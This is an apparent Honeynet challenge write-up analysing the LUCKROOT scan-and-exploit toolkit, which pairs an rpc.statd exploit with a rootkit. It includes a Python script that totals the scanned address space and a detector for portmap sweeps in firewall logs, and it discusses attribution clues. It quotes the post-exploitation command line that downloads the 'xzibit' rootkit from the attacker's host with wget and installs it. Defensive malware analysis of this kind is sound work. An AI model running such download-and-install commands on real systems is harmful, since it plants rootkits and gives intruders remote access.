1. What is the blackhat attempting to do with his command line syntax?

The intruder creates an obscure directory as a workspace (/usr/sbin/.mail)
and downloads the LUCKROOT toolset from another web server under the attacker's
control (becys.org). The filename is misleading: the file is actually a gzipped
tar archive (.tar.gz or .tgz). The intruder extracts the tools and runs the luckgo
script several times against various networks. The networks targeted were most
likely entered at random, but they map to the following:

command typed        network attacked     who owns it?
./luckgo 216 210     216.210.0.0/16       TotalNet Inc.
./luckgo 200 120     200.120.0.0/16       unallocated
./luckgo 64 120      64.120.0.0/16        unallocated
./luckgo 216 200     216.200.0.0/16       Abovenet Communications, Inc.
./luckgo 200 120     200.120.0.0/16       repeat
./luckgo 63 1        63.1.0.0/16          UUNET Technologies, Inc.
./luckgo 216 10      216.10.0.0/16        many class c allocations (various)
./luckgo 210 120     210.120.0.0/16       many class c allocations (Korean)
./luckgo 64 1        64.1.0.0/16          unallocated
./luckgo 216 1       216.1.0.0/16         several class c allocations
./luckgo 194 1       194.1.0.0/16         many class c allocations (Slovak Republic)
./luckgo 216 1       216.1.0.0/16         repeat
./luckgo 210 128     210.128.0.0/16       many class c allocations (Japan)
./luckgo 24 1        24.1.0.0/16          @Home Network (numerous regions)
./luckgo 12 20       12.20.0.0/16         many class c allocations (ATT)

Notice that the attacker would have scanned roughly 196k unallocated
IPs (three /16 blocks, one of which was scanned twice for another 65k) had the
Honeynet firewall allowed the outbound connections, a considerable waste of
resources and a clear illustration that much of the script kiddie behavior is
random. Worse still, though less illustrative of their inefficiency, is that they
would have scanned roughly 655k IPs in allocated space (ten /16 blocks), possibly
compromising hundreds of machines. A complete list of affected networks is
available upon request (vision@whitehats.com), but anyone can look these
allocations up from ARIN.
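The address-space figures above follow directly from the "./luckgo A B" to A.B.0.0/16 mapping. The following script is an added example (not part of the original writeup or the LUCKROOT package) that reconstructs the sweep plan from the intruder's command history and totals the addresses by allocation status. The history string is constructed from the table above, and the UNALLOCATED set is taken from the "who owns it?" column; both are assumptions of the example, not live registry data.

```python
import re
from ipaddress import IPv4Network

# Allocation status per /16 taken from the "who owns it?" column above;
# every other block in the history is treated as allocated (as of the writeup).
UNALLOCATED = {"200.120.0.0/16", "64.120.0.0/16", "64.1.0.0/16"}

# Constructed sample: the luckgo invocations from the table above, in the
# order the intruder typed them, plus one unrelated command as noise.
HISTORY = """\
cd /usr/sbin/.mail
./luckgo 216 210
./luckgo 200 120
./luckgo 64 120
./luckgo 216 200
./luckgo 200 120
./luckgo 63 1
./luckgo 216 10
./luckgo 210 120
./luckgo 64 1
./luckgo 216 1
./luckgo 194 1
./luckgo 216 1
./luckgo 210 128
./luckgo 24 1
./luckgo 12 20
"""

LUCKGO = re.compile(r"^\./luckgo\s+(\d{1,3})\s+(\d{1,3})\s*$")


def target_of(cmdline):
    """Map './luckgo A B' to the A.B.0.0/16 block luckscan-a will sweep.
    Returns None for other commands or for out-of-range octets."""
    m = LUCKGO.match(cmdline.strip())
    if not m:
        return None
    a, b = int(m.group(1)), int(m.group(2))
    if a > 255 or b > 255:
        return None
    return IPv4Network(f"{a}.{b}.0.0/16")


def summarize(history):
    """Count the addresses the sweeps would have covered, split by
    allocation status, and the addresses that would have been swept twice."""
    seen = set()
    stats = {"networks": 0, "allocated": 0, "unallocated": 0,
             "repeat_allocated": 0, "repeat_unallocated": 0}
    for line in history.splitlines():
        net = target_of(line)
        if net is None:
            continue
        key = str(net)
        status = "unallocated" if key in UNALLOCATED else "allocated"
        if key in seen:
            # A block the intruder already swept: pure wasted effort.
            stats["repeat_" + status] += net.num_addresses
            continue
        seen.add(key)
        stats["networks"] += 1
        stats[status] += net.num_addresses
    return stats


if __name__ == "__main__":
    print(summarize(HISTORY))
```

Run as-is it reports 13 distinct /16 blocks, 655,360 allocated and 196,608 unallocated addresses, with one allocated and one unallocated block (65,536 addresses each) swept twice, which is where the 196k, 65k and 655k figures above come from.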

luckgo (shell script)
Runs luckscan-a against a network address range specified at the command
line. If the luckscan-a and luckstatdx program binaries are not present,
this script detects this and tries to compile them from source. If
a scan.log file is present it is deleted.

luckscan-a (c source and binary)
Network scanner that sweeps the specified IP range for a particular
service using tcp connect (noisy full-connection). When called from
the luckgo script, it always scans for the portmap service at
port 111. Each time the scanner finds a host running portmap, it launches
luckstatdx, passing the target IP as a parameter (./luckstatdx -d 0 TARGET).

luckstatdx (c source and binary)
rpc.statd remote exploit that can be used to run arbitrary code on
the target server. When called from luckscan-a, this exploit always
uses the default settings to attack Redhat 6.2. Upon gaining
access on the target server, luckstatdx runs the following shell commands,
which effectively trojan the remote system:
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar
-zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

3. How does the tool work?

luckgo is a shell script that runs the scanner against a target network. The
attacker runs the luckgo script with the first two octets of the intended
victim network as parameters. For example, to scan and exploit
10.10.0.0/16 they would type "./luckgo 10 10". luckgo runs the scanner
luckscan-a, which in turn runs the exploit luckstatdx against each target IP
that is found to have the portmap service running. The scanner makes no
attempt to determine the operating system type or version before launching the
exploit (luckstatdx is always run with its Redhat 6.2 defaults), so this
shotgun approach is basically a blind mass-attack.

When a host with portmap open is found, the rpc.statd exploit is run against
it; if the exploit succeeds, certain shell commands are run on the remote server.
These commands cause the victim to download and install a rootkit called "xzibit",
which replaces system commands with the intention of hiding the intruder's presence
and allowing remote access.
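Because luckscan-a uses full TCP connects, a sweep of a /16 on port 111 from one source is easy to spot at a perimeter firewall, which is how the Honeynet saw it. The following is an added example (not part of the original writeup or the LUCKROOT package) that flags that pattern in connection logs: it groups outbound SYNs to tcp/111 by source and destination /16 and reports any source that touched many distinct hosts in one block. The log format is an iptables-LOG-like layout and the log lines themselves are constructed for the example; the field names, the honeynet address 10.1.1.5 and the threshold are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network


# Constructed sample log (not from the challenge): the honeynet host 10.1.1.5
# sweeping 216.210.0.0/16 on tcp/111, mixed with traffic that must not trigger.
def constructed_log():
    lines = [f"fw: OUT SRC=10.1.1.5 DST=216.210.0.{i} PROTO=TCP DPT=111 SYN"
             for i in range(1, 31)]
    lines += [
        "fw: OUT SRC=10.1.1.5 DST=192.0.2.10 PROTO=TCP DPT=80 SYN",
        "fw: OUT SRC=10.1.1.9 DST=198.51.100.7 PROTO=TCP DPT=111 SYN",
        "fw: IN SRC=203.0.113.4 DST=10.1.1.5 PROTO=TCP DPT=22 SYN",
        "fw: OUT SRC=10.1.1.5 DST=not-an-ip PROTO=TCP DPT=111 SYN",
    ]
    return lines


# Only outbound TCP records matter: the scanner is the honeynet host dialing out.
LOG_RE = re.compile(r"\bOUT\b.*?SRC=(\S+)\s+DST=(\S+)\s+PROTO=TCP\s+DPT=(\d+)")


def parse_outbound(line):
    """Return (src, dst, dport) for an outbound TCP line, or None if the line
    is inbound, malformed, or carries an unparseable address."""
    m = LOG_RE.search(line)
    if not m:
        return None
    try:
        src, dst = ip_address(m.group(1)), ip_address(m.group(2))
    except ValueError:
        return None
    return src, dst, int(m.group(3))


def find_sweeps(lines, port=111, threshold=16):
    """Group outbound connections to `port` by (source, destination /16) and
    return (src, block, distinct_hosts) for groups reaching `threshold`."""
    hosts = defaultdict(set)
    for line in lines:
        rec = parse_outbound(line)
        if rec is None:
            continue
        src, dst, dport = rec
        if dport != port or dst.version != 4:
            continue
        # Collapse the destination to the /16 luckgo hands to luckscan-a.
        block = ip_network(f"{dst}/16", strict=False)
        hosts[(str(src), str(block))].add(dst)
    return sorted((src, block, len(dsts))
                  for (src, block), dsts in hosts.items()
                  if len(dsts) >= threshold)


if __name__ == "__main__":
    for src, block, n in find_sweeps(constructed_log()):
        print(f"{src} swept {n} distinct hosts in {block} on tcp/111")
```

The threshold is deliberately low because a legitimate host rarely opens portmap connections to more than a handful of distinct addresses in one /16; tune it to the environment, and pair the count with a time window when timestamps are available.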

4. Is this tool a worm, or would you classify it as something else?

LUCKROOT is not a worm because it lacks an automated infection mechanism: the
hosts it compromises receive a rootkit, not a copy of the scanner. The tool is
used manually by an attacker to scan large network blocks for the rpc.statd
vulnerability and exploit potential targets. This tool is a "scripted scan
and exploit package".

5. Is this tool original, or is it simply based on previous tools? If based
on previous tools, which ones and what is modified?

All tools in the LUCKROOT package are slight variations of existing tools.
In the underground community this is called "ripping" and is an all-too-common
occurrence where one person takes "credit" for the work of another.

luckgo
June 2000. Shell script included in VetesGirl's scanning tools
that can be seen at http://www.self-evident.com/exploits/vetes/.
There are several tool packages each with a different name, but
using the same code. For example look at amdscanner.tar.gz for the
file "/amd/massa/ama" and compare to luckgo.

What was modified: The author credits were changed from "VetesGirl" to "BeCyS",
and there were slight changes to the names of each program.

luckscan-a
June 2000. C program also included in VetesGirl's scanning tools
from http://www.self-evident.com/exploits/vetes/. Using the same example
from above, you can look at the file "/amd/massa/pscan-a.c"
from amdscanner.tar.gz and compare to luckscan-a.c.

What was modified: Instead of just displaying which targets have the open port,
the program now exploits each target as well.

luckstatdx
August 2000. rpc.statd exploit written by ron1n, posted to Bugtraq
as statdx.c.
http://www.securityfocus.com/archive/1/74148
Note that this is the old version of the exploit; there have been
several other exploits since, including an update from ron1n called
statdx2.c, but for some reason attackers only seem to be using the
older version.

What was modified: Author credits have been changed from "ron1n" to "becys",
and the commands run on the exploited target host have been altered
to instead retrieve and install a rootkit.

Bonus Question:
What information can you obtain about who is using or created the tool?

The source IP address used in the attack wasn't shown in the challenge, but
there are numerous clues to consider about the tool author from analysis of
the tool.

Where the tools came from: The LUCKROOT.TAR package is downloaded from becys.org,
a site which has only a shockwave intro with no further content. Inspection
of the domain record shows that the domain was created last year using suspicious
information - for example I called the contact phone number listed and the person
had no idea about the becys.org domain. The contact address becys@yahoo.com
shows up in the domain record and becys@becys.org in the attack tool.
Since the rootkit is still available for download from becys.org, it is somewhat
likely that this host is controlled by the attacker (apparently BeCyS).

Credits in the attack tools: BeCyS, ReSpEkT, and coSes are mentioned in the
tools as authors or references. I looked for each name in the large IRC networks,
and found ReSpEkT on Undernet. I asked about BeCyS and through five minutes'
conversation was told that there are feuds between them and that BeCyS may have
dropped ReSpEkT's name to get him in trouble. There was nothing conclusive here
as it may all be the same individual, though it would imply a higher level
of deception and forethought than is evidenced by the use of the attack tools.
ReSpEkT was in a channel with known Romanian blackhats who we have seen attack
the honeynet before.

Rootkit configuration files: There are some preset variables in the xzibit.tar.gz
rootkit downloaded from becys.org. Three address ranges are specified that will
cause the trojaned system utilities to ignore traffic from certain networks,
which are all in Romania. One is the Romanian Education Network, and the other
two appear to be .ro ISPs. Again assuming the attacker or attackers lack the
sophistication to employ an elaborate decoy or framing operation, this would
indicate the intruder is connecting from Romania.